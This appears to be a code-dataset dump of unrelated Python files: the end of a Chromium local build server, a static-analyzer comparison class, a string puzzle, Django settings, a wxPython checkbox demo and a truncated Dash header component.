self.stamp_file))\n except FileNotFoundError:\n pass\n else:\n # Ninja will rebuild targets when their inputs change even if their stamp\n # file has a later modified time. Thus we do not need to worry about the\n # script being run by the build server updating the mtime incorrectly.\n pass\n\n\ndef _listen_for_request_data(sock: socket.socket):\n while True:\n conn = sock.accept()[0]\n received = []\n with conn:\n while True:\n data = conn.recv(4096)\n if not data:\n break\n received.append(data)\n if received:\n yield json.loads(b''.join(received))\n\n\ndef _process_requests(sock: socket.socket):\n # Since dicts in python can contain anything, explicitly type tasks to help\n # make static type checking more useful.\n tasks: Dict[Tuple[str, str], Task] = {}\n try:\n for data in _listen_for_request_data(sock):\n task = Task(name=data['name'],\n cwd=data['cwd'],\n cmd=data['cmd'],\n stamp_file=data['stamp_file'])\n Logger.total_tasks += 1\n existing_task = tasks.get(task.key)\n if existing_task:\n existing_task.terminate()\n tasks[task.key] = task\n # TODO(wnwen): Rather than start it right away, add this task to a running\n # queue and run either a limited number of processes (10) or\n # even just 1 until the server load is very low (or ninja has\n # finished).\n task.start()\n except KeyboardInterrupt:\n Logger.log('STOPPING SERVER...', end='\\n')\n # Gracefully exit by terminating all running tasks and allowing their io\n # watcher threads to finish and run cleanup on their own.\n for task in tasks.values():\n task.terminate()\n Logger.log('STOPPED', end='\\n')\n\n\ndef main():\n parser = argparse.ArgumentParser(description=__doc__)\n parser.parse_args()\n with socket.socket(socket.AF_UNIX) as sock:\n sock.bind(server_utils.SOCKET_ADDRESS)\n sock.listen()\n _process_requests(sock)\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","sub_path":"build/android/fast_local_dev_server.py","file_name":"fast_local_dev_server.py","file_ext":"py","file_size_in_byte":6813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"331799772","text":"import numpy as np\nimport copy\nimport clang\nimport clang.cindex\n\n# Internal imports\nfrom projectLib.Common import srch_list_ind, save_list, load_list, print_numpy\nfrom projectLib.Classes.AnalyzerInfo import AnalyzerInfo\nfrom projectLib.ProjectConfig import type_groups\nfrom projectLib.Classes.FileInfo import FileInfo\nfrom projectLib.Classes.ErrorInfo import ErrorInfo\n\n\nclass Comparison:\n\n def __init__(self,\n analyzer1_info: AnalyzerInfo=AnalyzerInfo(),\n analyzer2_info: AnalyzerInfo=AnalyzerInfo()):\n\n self.name_catalog_an1 = []\n self.name_catalog_an2 = []\n self.stat_matrix = None\n\n self.analyzer1_info = copy.deepcopy(analyzer1_info)\n self.analyzer2_info = copy.deepcopy(analyzer2_info)\n\n def check_both_FileInfo_format(self):\n if self.analyzer1_info.info_type != \"FileInfo\" or \\\n self.analyzer2_info.info_type != \"FileInfo\":\n print(\"GROUP COMPARISON ONLY SUPPORTED FOR FileInfo info_type\")\n return False\n return True\n\n def get_errors_only_in_analyzer_num(self, analyzer_num: int):\n if not self.check_both_FileInfo_format():\n return -1\n\n if analyzer_num == 1:\n analyzer_info = self.analyzer1_info\n else:\n if analyzer_num == 2:\n analyzer_info = self.analyzer2_info\n else:\n print(\"NO SUCH ANALYZER_NUM\")\n return -1\n\n result_analyzer_info = AnalyzerInfo(analyzer_name=analyzer_info.analyzer_name,\n info_type=analyzer_info.info_type)\n\n # FileInfo actions BEGIN\n for file_info in analyzer_info.info:\n file_to_add = FileInfo(file=file_info.file)\n for error_info in file_info.errors:\n if not error_info.has_bindings():\n file_to_add.append(error_info)\n if file_to_add.has_errors():\n result_analyzer_info.append(file_to_add)\n\n # FileInfo actions END\n return result_analyzer_info\n\n def get_errors_in_all_analyzers(self):\n if not self.check_both_FileInfo_format():\n return -1\n\n result_analyzer_info = AnalyzerInfo(analyzer_name=\"COMBINED\",\n info_type=self.analyzer1_info)\n\n # FileInfo actions BEGIN\n\n for file_info_an1 in self.analyzer1_info.info:\n for error_info_an1 in file_info_an1:\n for binding in error_info_an1.bindings:\n filename_to_search = file_info_an1.file\n if binding.file:\n filename_to_search = binding.file\n file_info_an2 = self.analyzer2_info.search_by_file(filename_to_search)\n error_info_an2 = file_info_an2[binding.ind]\n result_analyzer_info.append(\n [ErrorInfo(\n file=file_info_an1.file,\n lines=error_info_an1.lines,\n type=error_info_an1.type),\n ErrorInfo(\n file=binding.file,\n lines=error_info_an2.lines,\n type=error_info_an2.type\n )])\n\n # FileInfo actions END\n return result_analyzer_info\n\n def comparison_copy(self, orig):\n self.name_catalog_an1 = copy.deepcopy(orig.name_catalog_an1)\n self.name_catalog_an2 = copy.deepcopy(orig.name_catalog_an2)\n self.stat_matrix = copy.deepcopy(orig.stat_matrix)\n\n self.analyzer1_info = copy.deepcopy(orig.analyzer1_info)\n self.analyzer2_info = copy.deepcopy(orig.analyzer2_info)\n\n def save_comparison(self, res_dir, comparison_id):\n\n name_catalog_an1_path = res_dir + \"/cmp_name_catalog_an1_ind\" + str(comparison_id) + \".data\"\n name_catalog_an2_path = res_dir + \"/cmp_name_catalog_an2_ind\" + str(comparison_id) + \".data\"\n stat_matrix_path = res_dir + \"/cmp_stat_matrix\" + str(comparison_id) + \".npy\"\n analyzer1_info_path = res_dir + \"/analyzer1_info\"\n analyzer2_info_path = res_dir + \"/analyzer2_info\"\n\n save_list(self.name_catalog_an1, name_catalog_an1_path)\n save_list(self.name_catalog_an2, name_catalog_an2_path)\n np.save(stat_matrix_path, self.stat_matrix)\n self.analyzer1_info.save_info(analyzer1_info_path, comparison_id)\n self.analyzer2_info.save_info(analyzer2_info_path, comparison_id)\n\n return 0\n\n def load_comparison(self, res_dir, comparison_id):\n\n name_catalog_an1_path = res_dir + \"/cmp_name_catalog_an1_ind\" + str(comparison_id) + \".data\"\n name_catalog_an2_path = res_dir + \"/cmp_name_catalog_an2_ind\" + str(comparison_id) + \".data\"\n stat_matrix_path = res_dir + \"/cmp_stat_matrix\" + str(comparison_id) + \".npy\"\n analyzer1_info_path = res_dir + \"/analyzer1_info\"\n analyzer2_info_path = res_dir + \"/analyzer2_info\"\n\n self.name_catalog_an1 = load_list(name_catalog_an1_path)\n self.name_catalog_an2 = load_list(name_catalog_an2_path)\n self.stat_matrix = np.load(stat_matrix_path)\n self.analyzer1_info.load_info(analyzer1_info_path, comparison_id)\n self.analyzer2_info.load_info(analyzer2_info_path, comparison_id)\n\n return 0\n\n def group_comparison(self, an1_type_groups, an2_type_groups):\n if not self.check_both_FileInfo_format():\n return -1\n\n result_comparison = Comparison(copy.deepcopy(self.analyzer1_info),\n copy.deepcopy(self.analyzer2_info))\n\n result_comparison.stat_matrix = np.zeros((self.stat_matrix.shape[0] - an1_type_groups[\"TOTAL_COMPRESSION\"],\n self.stat_matrix.shape[1] - an2_type_groups[\"TOTAL_COMPRESSION\"]),\n dtype=np.int)\n\n name_catalog_an1_dict = []\n name_catalog_an1_initial = []\n\n for el_ind in range(len(self.name_catalog_an1)):\n name_catalog_an1_initial.append([self.name_catalog_an1[el_ind], [el_ind]])\n\n for dict_name in an1_type_groups:\n if dict_name == \"TOTAL_COMPRESSION\":\n continue\n dict_name_column_list = []\n for catalog_name_ind in range(len(self.name_catalog_an1)):\n if self.name_catalog_an1[catalog_name_ind] in an1_type_groups[dict_name]:\n dict_name_column_list.append(catalog_name_ind)\n name_catalog_an1_initial.remove([self.name_catalog_an1[catalog_name_ind], [catalog_name_ind]])\n name_catalog_an1_dict.append([dict_name, dict_name_column_list])\n\n name_catalog_an2_dict = []\n name_catalog_an2_initial = []\n\n for el_ind in range(len(self.name_catalog_an2)):\n name_catalog_an2_initial.append([self.name_catalog_an2[el_ind], [el_ind]])\n\n for dict_name in an2_type_groups:\n if dict_name == \"TOTAL_COMPRESSION\":\n continue\n dict_name_column_list = []\n for catalog_name_ind in range(len(self.name_catalog_an2)):\n if self.name_catalog_an2[catalog_name_ind] in an2_type_groups[dict_name]:\n dict_name_column_list.append(catalog_name_ind)\n name_catalog_an2_initial.remove(\n [self.name_catalog_an2[catalog_name_ind], [catalog_name_ind]])\n name_catalog_an2_dict.append([dict_name, dict_name_column_list])\n\n name_catalog_an1_merged = name_catalog_an1_dict + name_catalog_an1_initial\n name_catalog_an2_merged = name_catalog_an2_dict + name_catalog_an2_initial\n\n for an1_ind in range(len(name_catalog_an1_merged)):\n for an2_ind in range(len(name_catalog_an2_merged)):\n for stat_matrix_ind_line in name_catalog_an1_merged[an1_ind][1]:\n for stat_matrix_ind_column in name_catalog_an2_merged[an2_ind][1]:\n result_comparison.stat_matrix[an1_ind][an2_ind] += \\\n self.stat_matrix[stat_matrix_ind_line][stat_matrix_ind_column]\n\n result_comparison.name_catalog_an1 = [name[0] for name in name_catalog_an1_merged]\n result_comparison.name_catalog_an2 = [name[0] for name in name_catalog_an2_merged]\n\n # FileInfo actions BEGIN\n for file_an1 in self.analyzer1_info.info:\n file_to_attach = FileInfo(file=file_an1.file)\n for er_in_file_an1 in file_an1:\n ind = srch_list_ind(self.name_catalog_an1, er_in_file_an1.type)\n for name_merged_ind in range(len(name_catalog_an1_merged)):\n if ind in name_catalog_an1_merged[name_merged_ind][1]:\n file_to_attach.errors.append(ErrorInfo(lines=er_in_file_an1.lines,\n type=name_catalog_an1_merged[name_merged_ind][0],\n bindings=er_in_file_an1.bindings))\n break\n\n for file_an2 in self.analyzer2_info.info:\n file_to_attach = FileInfo(file=file_an2.file)\n for er_in_file_an2 in file_an2:\n ind = srch_list_ind(self.name_catalog_an2, er_in_file_an2.type)\n for name_merged_ind in range(len(name_catalog_an2_merged)):\n if ind in name_catalog_an2_merged[name_merged_ind][1]:\n file_to_attach.errors.append(ErrorInfo(lines=er_in_file_an2.lines,\n type=name_catalog_an2_merged[name_merged_ind][0],\n bindings=er_in_file_an2.bindings))\n break\n # FileInfo actions END\n return result_comparison\n\n def print_comparison(self, mode=\"stat\"):\n if not self.check_both_FileInfo_format():\n return -1\n\n if mode == \"stat\":\n print_numpy(self.stat_matrix, self.name_catalog_an1, self.name_catalog_an2)\n return 0\n # FileInfo actions BEGIN\n if mode == \"an1\":\n only_analyzer1_errors = self.get_errors_only_in_analyzer_num(1)\n for file_info in only_analyzer1_errors.info:\n print(file_info)\n\n for error_info in file_info:\n print(error_info)\n return 0\n\n if mode == \"an2\":\n only_analyzer2_errors = self.get_errors_only_in_analyzer_num(2)\n for file_info in only_analyzer2_errors.info:\n print(file_info)\n\n for error_info in file_info:\n print(error_info)\n return 0\n\n if mode == \"an_both\":\n both_analyzers_errors = self.get_errors_in_all_analyzers()\n ind = 0\n for binding in both_analyzers_errors.info:\n print(\"binding number: {}\".format(ind))\n ind += 1\n print(binding[0])\n print(binding[1])\n return 0\n # FileInfo actions END\n print(\"NO SUCH MODE\")\n return -1\n\n def stat_matrix_fill_by_bindings(self):\n for file_info_an1 in self.analyzer1_info.info:\n for error_info_an1 in file_info_an1:\n\n name_catalog1_ind = srch_list_ind(self.name_catalog_an1, error_info_an1.type)\n self.stat_matrix[name_catalog1_ind, -1] += 1\n\n if not error_info_an1.has_bindings():\n self.stat_matrix[name_catalog1_ind, -2] += 1\n\n for binding in error_info_an1.bindings:\n filename_to_search = file_info_an1.file\n if binding.file:\n filename_to_search = binding.file\n file_info_an2 = self.analyzer2_info.search_by_file(filename_to_search)\n error_info_an2 = file_info_an2[binding.ind]\n\n name_catalog2_ind = srch_list_ind(self.name_catalog_an2, error_info_an2.type)\n\n self.stat_matrix[name_catalog1_ind, name_catalog2_ind] += 1\n\n for file_info_an2 in self.analyzer2_info.info:\n for error_info_an2 in file_info_an2:\n\n name_catalog2_ind = srch_list_ind(self.name_catalog_an2, error_info_an2.type)\n self.stat_matrix[-1, name_catalog2_ind] += 1\n\n if not error_info_an2.has_bindings():\n self.stat_matrix[-2, name_catalog2_ind] += 1\n\n def __subproc_fill_for_set_operations(self):\n result_comparison = Comparison()\n result_comparison.name_catalog_an1 = copy.deepcopy(self.name_catalog_an1)\n result_comparison.name_catalog_an2 = copy.deepcopy(self.name_catalog_an2)\n\n result_comparison.stat_matrix = np.zeros(self.stat_matrix.shape, dtype='int')\n\n result_comparison.analyzer1_info = AnalyzerInfo(analyzer_name=self.analyzer1_info.analyzer_name,\n info_type=self.analyzer1_info.info_type)\n result_comparison.analyzer2_info = AnalyzerInfo(analyzer_name=self.analyzer2_info.analyzer_name,\n info_type=self.analyzer2_info.info_type)\n\n return result_comparison\n\n def __subproc_comparison_union_form_info(self, another_comparison, result_comparison, analyzer_num):\n if analyzer_num == 1:\n self_analyzer_info = self.analyzer1_info\n another_comparison_analyzer_info = another_comparison.analyzer1_info\n else:\n self_analyzer_info = self.analyzer2_info\n another_comparison_analyzer_info = another_comparison.analyzer2_info\n\n for file_info_cmp1 in self_analyzer_info.info:\n file_info_to_add = FileInfo(file=file_info_cmp1.file)\n file_info_cmp2 = another_comparison_analyzer_info.search_by_file(file_info_cmp1.file)\n for error_info_ind in range(len(file_info_cmp1.errors)):\n bindings_to_add = copy.deepcopy(file_info_cmp1.errors[error_info_ind].bindings)\n for binding_cmp2 in file_info_cmp2.errors[error_info_ind].bindings:\n if binding_cmp2 not in bindings_to_add:\n bindings_to_add.append(binding_cmp2)\n file_info_to_add.append(ErrorInfo(lines=file_info_cmp1.errors[error_info_ind].lines,\n type=file_info_cmp1.errors[error_info_ind].type,\n bindings=bindings_to_add))\n if analyzer_num == 1:\n # print(file_info_to_add)\n # for el in file_info_to_add:\n # print(el)\n result_comparison.analyzer1_info.append(file_info_to_add)\n else:\n result_comparison.analyzer2_info.append(file_info_to_add)\n return 0\n\n def comparison_union(self, another_comparison):\n\n if not self.check_both_FileInfo_format():\n return -1\n\n result_comparison = self.__subproc_fill_for_set_operations()\n\n # FileInfo actions BEGIN\n\n self.__subproc_comparison_union_form_info(another_comparison, result_comparison, analyzer_num=1)\n self.__subproc_comparison_union_form_info(another_comparison, result_comparison, analyzer_num=2)\n\n result_comparison.stat_matrix_fill_by_bindings()\n # FileInfo actions END\n\n return result_comparison\n\n def __same_error_extract_both(self, current_error_ind):\n result_list_an1 = []\n result_list_an2 = []\n current_error = self.error_list_both[current_error_ind]\n for error_ind in range(current_error_ind + 1, len(self.error_list_both)):\n error = self.error_list_both[error_ind]\n if current_error[0] != error[0]:\n break\n\n if current_error[1] == error[1] and \\\n current_error[3] == error[3]:\n result_list_an1.append([error[2], error[4]])\n\n if current_error[2] == error[2] and \\\n current_error[4] == error[4]:\n result_list_an2.append([error[1], error[3]])\n return result_list_an1, result_list_an2\n\n def __subproc_comparison_substraction_form_info(self, another_comparison, result_comparison, analyzer_num):\n if analyzer_num == 1:\n self_analyzer_info = self.analyzer1_info\n another_comparison_analyzer_info = another_comparison.analyzer1_info\n else:\n self_analyzer_info = self.analyzer2_info\n another_comparison_analyzer_info = another_comparison.analyzer2_info\n\n for file_info_cmp1 in self_analyzer_info.info:\n file_info_to_add = FileInfo(file=file_info_cmp1.file)\n file_info_cmp2 = another_comparison_analyzer_info.search_by_file(file_info_cmp1.file)\n for error_info_ind in range(len(file_info_cmp1.errors)):\n bindings_to_add = []\n for binding_cmp1 in file_info_cmp1[error_info_ind].bindings:\n if binding_cmp1 not in file_info_cmp2[error_info_ind].bindings:\n bindings_to_add.append(binding_cmp1)\n file_info_to_add.append(ErrorInfo(lines=file_info_cmp1[error_info_ind].lines,\n type=file_info_cmp1[error_info_ind].type,\n bindings=bindings_to_add))\n\n if analyzer_num == 1:\n result_comparison.analyzer1_info.append(file_info_to_add)\n else:\n result_comparison.analyzer2_info.append(file_info_to_add)\n\n def comparison_substraction(self, another_comparison):\n if not self.check_both_FileInfo_format():\n return -1\n\n result_comparison = self.__subproc_fill_for_set_operations()\n\n # FileInfo actions BEGIN\n self.__subproc_comparison_substraction_form_info(another_comparison, result_comparison, analyzer_num=1)\n self.__subproc_comparison_substraction_form_info(another_comparison, result_comparison, analyzer_num=2)\n\n result_comparison.stat_matrix_fill_by_bindings()\n # FileInfo actions END\n\n return result_comparison\n\n def __subproc_comparison_intersection_form_info(self, another_comparison, result_comparison, analyzer_num):\n if analyzer_num == 1:\n self_analyzer_info = self.analyzer1_info\n another_comparison_analyzer_info = another_comparison.analyzer1_info\n else:\n self_analyzer_info = self.analyzer2_info\n another_comparison_analyzer_info = another_comparison.analyzer2_info\n\n for file_info_cmp1 in self_analyzer_info.info:\n file_info_to_add = FileInfo(file=file_info_cmp1.file)\n file_info_cmp2 = another_comparison_analyzer_info.search_by_file(file_info_cmp1.file)\n for error_info_ind in range(len(file_info_cmp1.errors)):\n bindings_to_add = []\n for binding_cmp1 in file_info_cmp1[error_info_ind].bindings:\n if binding_cmp1 in file_info_cmp2[error_info_ind].bindings:\n bindings_to_add.append(binding_cmp1)\n file_info_to_add.append(ErrorInfo(lines=file_info_cmp1.errors[error_info_ind].lines,\n type=file_info_cmp1.errors[error_info_ind].type,\n bindings=bindings_to_add))\n if analyzer_num == 1:\n result_comparison.analyzer1_info.append(file_info_to_add)\n else:\n result_comparison.analyzer2_info.append(file_info_to_add)\n return 0\n\n def comparison_intersection(self, another_comparison):\n if not self.check_both_FileInfo_format():\n return -1\n\n result_comparison = self.__subproc_fill_for_set_operations()\n\n # FileInfo actions BEGIN\n self.__subproc_comparison_intersection_form_info(another_comparison, result_comparison, analyzer_num=1)\n self.__subproc_comparison_intersection_form_info(another_comparison, result_comparison, analyzer_num=2)\n\n result_comparison.stat_matrix_fill_by_bindings()\n # FileInfo actions END\n\n return result_comparison\n\n def heur_fill_for_heuristics(self, analyzer1_info: AnalyzerInfo, analyzer2_info: AnalyzerInfo):\n\n self.name_catalog_an1 = [warn[0] for warn in analyzer1_info.count_warnings()]\n self.name_catalog_an2 = [warn[0] for warn in analyzer2_info.count_warnings()]\n\n self.name_catalog_an1.append(\"ONLY_IN_ANALYZER2\")\n self.name_catalog_an1.append(\"TOTAL_AMOUNT_AN2\")\n\n self.name_catalog_an2.append(\"ONLY_IN_ANALYZER1\")\n self.name_catalog_an2.append(\"TOTAL_AMOUNT_AN1\")\n\n self.stat_matrix = np.zeros((len(self.name_catalog_an1), len(self.name_catalog_an2)), dtype=\"int\")\n self.stat_matrix[-1][-1] = -1\n self.stat_matrix[-1][-2] = -1\n self.stat_matrix[-2][-1] = -1\n self.stat_matrix[-2][-2] = -1\n\n self.analyzer1_info = copy.deepcopy(analyzer1_info)\n self.analyzer2_info = copy.deepcopy(analyzer2_info)\n\n return 0\n\n def search_entities_in_lines(self, node: clang.cindex.Cursor, found_lines: list, result_set: set):\n #dump_ast(node)\n if node.kind == clang.cindex.CursorKind.VAR_DECL or \\\n node.kind == clang.cindex.CursorKind.DECL_REF_EXPR:\n if node.location.line in found_lines:\n result_set.add(str(node.displayname))\n for c in node.get_children():\n self.search_entities_in_lines(c, found_lines, result_set)\n\n def present_entity_uses(self, node, lines_list, variable_set):\n if node.kind == clang.cindex.CursorKind.VAR_DECL or \\\n node.kind == clang.cindex.CursorKind.DECL_REF_EXPR:\n if node.location.line in lines_list:\n if str(node.displayname) in variable_set:\n return True\n for c in node.get_children():\n if self.present_entity_uses(c, lines_list, variable_set):\n return True\n return False\n\n def analyze_comparison_buffer_overflow(self):\n\n if not self.check_both_FileInfo_format():\n return -1\n\n list_buf_overflow_types_an1 = type_groups[self.analyzer1_info.analyzer_name][\"Buffer_overflow\"]\n list_buf_overflow_types_an2 = type_groups[self.analyzer2_info.analyzer_name][\"Buffer_overflow\"]\n\n analyzer1_info_res = AnalyzerInfo(analyzer_name=self.analyzer1_info.analyzer_name,\n info_type=self.analyzer1_info.info_type)\n analyzer2_info_res = AnalyzerInfo(analyzer_name=self.analyzer2_info.analyzer_name,\n info_type=self.analyzer2_info.info_type)\n\n def analyze_comparison_buffer_overflow_old(self):\n\n list_buf_overflow_types_an1 = type_groups[self.analyzer1_info.analyzer_name][\"Buffer_overflow\"]\n list_buf_overflow_types_an2 = type_groups[self.analyzer2_info.analyzer_name][\"Buffer_overflow\"]\n\n found_corresponding_er_both_an1 = np.zeros((len(self.error_list_an1)), dtype=np.bool)\n found_corresponding_er_both_an2 = np.zeros((len(self.error_list_an2)), dtype=np.bool)\n\n error_list_an1_res = []\n error_list_an2_res = []\n error_list_both_res = []\n\n for found_error_an1 in self.error_list_both:\n if found_error_an1[3] in list_buf_overflow_types_an1:\n found_filename = found_error_an1[0]\n found_lines = found_error_an1[1]\n\n same_file_error_ind_list_an1 = []\n same_file_error_list_an1 = []\n\n same_file_error_ind_list_an2 = []\n same_file_error_list_an2 = []\n\n for unfound_error_an1_ind in range(len(self.error_list_an1)):\n if self.error_list_an1[unfound_error_an1_ind][0] == found_filename and \\\n self.error_list_an1[unfound_error_an1_ind][2] in list_buf_overflow_types_an1:\n same_file_error_ind_list_an1.append(unfound_error_an1_ind)\n same_file_error_list_an1.append(self.error_list_an1[unfound_error_an1_ind])\n\n for unfound_error_an2_ind in range(len(self.error_list_an2)):\n if self.error_list_an2[unfound_error_an2_ind][0] == found_filename and \\\n self.error_list_an2[unfound_error_an2_ind][2] in list_buf_overflow_types_an2:\n same_file_error_ind_list_an2.append(unfound_error_an2_ind)\n same_file_error_list_an2.append(self.error_list_an1[unfound_error_an2_ind])\n\n index = clang.cindex.Index.create()\n translation_unit = index.parse(found_filename, args=[\"-std=c++17\"])\n cursor = translation_unit.cursor\n\n variable_set = set()\n self.search_entities_in_lines(cursor, found_lines, variable_set)\n\n for er_ind in range(len(same_file_error_list_an1)):\n if self.present_entity_uses(cursor, same_file_error_list_an1[er_ind][1], variable_set):\n\n error_name1 = same_file_error_list_an1[er_ind][2]\n error_name2 = found_error_an1[4]\n\n ind1 = srch_list_ind(self.name_catalog_an1, error_name1)\n ind2 = srch_list_ind(self.name_catalog_an2, error_name2)\n\n if not found_corresponding_er_both_an1[same_file_error_ind_list_an1[er_ind]]:\n self.stat_matrix[ind1][-2] -= 1\n found_corresponding_er_both_an1[same_file_error_ind_list_an1[er_ind]] = True\n\n self.stat_matrix[ind1][ind2] += 1\n\n error_list_both_res.append([found_filename,\n same_file_error_list_an1[er_ind][1],\n found_error_an1[2],\n error_name1,\n error_name2])\n\n for er_ind in range(len(same_file_error_list_an2)):\n if self.present_entity_uses(cursor, same_file_error_list_an2[er_ind][1], variable_set):\n\n error_name1 = found_error_an1[3]\n error_name2 = same_file_error_list_an2[er_ind][2]\n\n ind1 = srch_list_ind(self.name_catalog_an1, error_name1)\n ind2 = srch_list_ind(self.name_catalog_an2, error_name2)\n\n if not found_corresponding_er_both_an2[same_file_error_ind_list_an2[er_ind]]:\n self.stat_matrix[-2][ind2] -= 1\n found_corresponding_er_both_an2[same_file_error_ind_list_an2[er_ind]] = True\n\n self.stat_matrix[ind1][ind2] += 1\n\n error_list_both_res.append([found_filename,\n found_error_an1[1],\n same_file_error_list_an2[er_ind][1],\n error_name1,\n error_name2])\n\n for error_an1_ind in range(len(self.error_list_an1)):\n if not found_corresponding_er_both_an1[error_an1_ind]:\n error_list_an1_res.append(self.error_list_an1[error_an1_ind])\n\n for error_an2_ind in range(len(self.error_list_an2)):\n if not found_corresponding_er_both_an2[error_an2_ind]:\n error_list_an2_res.append(self.error_list_an2[error_an2_ind])\n\n self.error_list_an1 = error_list_an1_res\n self.error_list_an2 = error_list_an2_res\n self.error_list_both = error_list_both_res\n\n return\n\n\n","sub_path":"projectLib/Classes/Comparison.py","file_name":"Comparison.py","file_ext":"py","file_size_in_byte":27962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"537231116","text":"#A string is said to be beautiful if b occurs in it no more times than a; c occurs in it no more times than b; etc.\n\n#Given a string, check whether it is beautiful.\n\n#For inputString = \"bbbaacdafe\", the output should be\n#isBeautifulString(inputString) = true;\n#For inputString = \"aabbb\", the output should be\n#isBeautifulString(inputString) = false;\n#For inputString = \"bbc\", the output should be\n#isBeautifulString(inputString) = false.\n\ndef isBeautifulString(inputString):\n chr = sorted(set(inputString))\n if chr[0] != 'a':\n return False\n count = inputString.count(chr[0])\n for i in range(len(chr)-1):\n if (ord(chr[i+1])-ord(chr[i]) != 1):\n return False\n for i in range(len(chr)):\n if (inputString.count(chr[i]) > count):\n return False\n else:\n count = inputString.count(chr[i])\n return True\n\n#print(isBeautifulString(\"bbc\"))\n#isBeautifulString(\"aabbb\")\n#print(isBeautifulString(\"bbbaacdafe\"))\nprint(isBeautifulString(\"aabbb\"))","sub_path":"Arcade/Intro/isBeautifulString.py","file_name":"isBeautifulString.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"27653824","text":"import os\n\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nPROJECT_ROOT = os.path.abspath(os.path.dirname(BASE_DIR))\n\nADMINS = (('Joshua Chandler', 'joshchandler88@gmail.com'),)\n\nALLOWED_HOSTS = ['*']\n\nSITE_ID = 1\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.sites',\n 'django.contrib.staticfiles',\n 'django_extensions',\n \n # Third Party Apps,\n 'rest_framework',\n 'rest_framework.authtoken',\n \n # Project Apps\n 'api.registration',\n 'api.user',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'django.middleware.security.SecurityMiddleware',\n)\n\nTEMPLATE_DIRS = (\n os.path.join(BASE_DIR, 'templates'),\n)\n\nROOT_URLCONF = 'api.urls'\n\nWSGI_APPLICATION = 'api.wsgi.application'\n\n# INTERNATIONALIZATION\nLANGUAGE_CODE = 'en-us'\nTIME_ZONE = 'UTC'\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\n\n# REGISTRATION\nACCOUNT_ACTIVATION_DAYS = 7\nREGISTRATION_DEFAULT_FROM_EMAIL = 'registration@email.com'\nREGISTRATION_EMAIL_HTML = True\n","sub_path":"api/settings/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"89833073","text":"import wx\r\n\r\nclass CheckBoxFrame(wx.Frame):\r\n def __init__(self):\r\n wx.Frame.__init__(self, None, -1, 'Checkbox Example', \r\n size=(200, 300))\r\n panel = wx.Panel(self, -1)\r\n self.cb1 = wx.CheckBox(panel, -1, \"Alpha\", (35, 40), (150, 20), name=\"Alpha\")\r\n self.cb2 = wx.CheckBox(panel, -1, \"Beta\", (35, 60), (150, 20), name=\"Beta\")\r\n self.cb3 = wx.CheckBox(panel, -1, \"Gamma\", (35, 80), (150, 20), name=\"Gamma\")\r\n \r\n self.cb1.Bind(wx.EVT_CHECKBOX, self.OnChecked)\r\n self.cb2.Bind(wx.EVT_CHECKBOX, self.OnChecked)\r\n self.cb3.Bind(wx.EVT_CHECKBOX, self.OnChecked)\r\n \r\n self.text = []\r\n \r\n self.staticText = wx.StaticText(panel, -1, \"Checked\", (35, 120))\r\n self.basicText = wx.TextCtrl(panel, -1, \"\", pos = (35, 140), size=(100, 20))\r\n self.basicText.SetInsertionPoint(0)\r\n\r\n def OnChecked(self, event):\r\n cb = event.GetEventObject()\r\n if cb.GetValue():\r\n self.text.append(cb.GetName())\r\n else:\r\n if cb.GetName() in self.text:\r\n self.text.remove(cb.GetName())\r\n self.basicText.SetValue(' '.join(sorted(self.text)))\r\n \r\n def OnChecked1(self, event):\r\n if self.cb1.GetValue():\r\n self.text.append(\"Alpha\")\r\n else:\r\n if \"Alpha\" in self.text:\r\n self.text.remove(\"Alpha\")\r\n self.basicText.SetValue(' '.join(sorted(self.text)))\r\n \r\n def OnChecked2(self, event):\r\n if self.cb2.GetValue():\r\n self.text.append(\"Beta\")\r\n else:\r\n if \"Beta\" in self.text:\r\n self.text.remove(\"Beta\")\r\n self.basicText.SetValue(' '.join(sorted(self.text)))\r\n\r\n def OnChecked3(self, event):\r\n if self.cb3.GetValue():\r\n self.text.append(\"Gamma\")\r\n else:\r\n if \"Gamma\" in self.text:\r\n self.text.remove(\"Gamma\")\r\n self.basicText.SetValue(' '.join(sorted(self.text)))\r\n \r\n \r\nif __name__ == '__main__':\r\n app = wx.PySimpleApp()\r\n CheckBoxFrame().Show()\r\n app.MainLoop() \r\n\r\n","sub_path":"wxPython/wxPIA_book/Chapter-07/checkbox.py","file_name":"checkbox.py","file_ext":"py","file_size_in_byte":2147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"9769640","text":"import dash_html_components as html\nimport dash_core_components as dcc\n\ndef Header():\n return html.Div([\n get_logo(),\n get_header(\"Company A\"),\n html.Br([]),\n get_menu()\n ])\n\ndef get_logo():\n logo = html.Div([\n\n html.Div([\n html.Img(src='https://static-www.rms.com/assets/blt4a6ddacca47281bf/lg-logo-rms.svg?q=123', height='80', width='80')\n ], className=\"ten columns padded\"),\n\n # html.Div([\n # dcc.Link('Full View ', href='/report/full-view')\n # ], className=\"two columns page-view no-print\")\n\n ], className=\"row gs-header\")\n return logo\n\n\ndef get_header(company_name):\n header = html.Div([\n\n html.Div([\n html.H5(\n company_name)\n ], className=\"twelve columns padded\")\n\n ], className=\"row gs-header gs-text-header\")\n return header\n\n\ndef get_menu():\n menu = html.Div([\n\n dcc.Link('Overview ', href='/overview', className=\"tab first\"),\n\n dcc.Link('Exposure Summary ', href='/exposure-summary', className=\"tab\"),\n\n dcc.Link('EP curves ', 